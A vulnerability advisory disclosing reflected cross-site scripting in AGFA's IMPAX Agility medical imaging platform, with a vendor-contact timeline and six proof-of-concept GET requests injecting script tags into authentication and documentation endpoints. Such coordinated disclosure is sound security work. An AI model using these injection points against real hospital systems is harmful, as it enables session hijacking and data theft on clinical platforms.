ImPAX Agility Multiple Cross Site Scripting Vulnerabilities
Tested versions: 1.1074.RC.b122.20150602
http://www.agfahealthcare.com/

Credits to: vesp3r / vesp3r7c3@gmail.com


About the Product
------------------
IMPAX Agility is designed to achieve clinical productivity and improve affordability.
It uses a single data model to provide a seamless system that offers relevant and 
varied clinical data in one, completely unified imaging management platform. 
IMPAX Agility’s sophisticated GUI provides users an uncluttered and intuitive 
user experience, as well the native diagnostic capabilities, streamlined navigation
and workflow, improve clinical productivity. Its modern IT platform helps hospitals
to maximize performance and control costs, by reducing overhead, upgrade time and
IT infrastructure investments.


Timeline contact
---------------

02/17 - initial contact
02/20 - Vendor asked for more information
03/30 - The vendor said the issue was solved
04/12 - Advisory published


Reflected Cross-Site Scripting
-----------------------------

1) GET /authentication/j_security_check?ignore_expired=true&resource=%2fxero%2vtf8t3"><script>alert(1)<%2fscript>hcg7wy771pe&j_password=&j_username= HTTP/1.1
2) GET /authentication/j_security_check?vt123"><script>alert(1)<%2fscript>be4rz=1 HTTP/1.1
3) GET /docs/enterpriseviewer/knowledgebase/en/?awbkk"><script>alert(1)<%2fscript>q4kpp=1 HTTP/1.1
4) GET /docs/enterpriseviewer/knowledgebase/en/topics/8825.html?vtzi2"><script>alert(1)<%2fscript>a6wo4=1 HTTP/1.1
5) GET /authentication/token?resource=%2fdocs%2fenterpriseviewer%2fknowledgebase%2fen%2ftopics%2f124446.htmltestbug"><script>alert(1)<%2fscript>ahz3a HTTP/1.1
6) GET /authentication/token?khr8y"><script>alert(1)<%2fscript>tn1f0=1 HTTP/1.1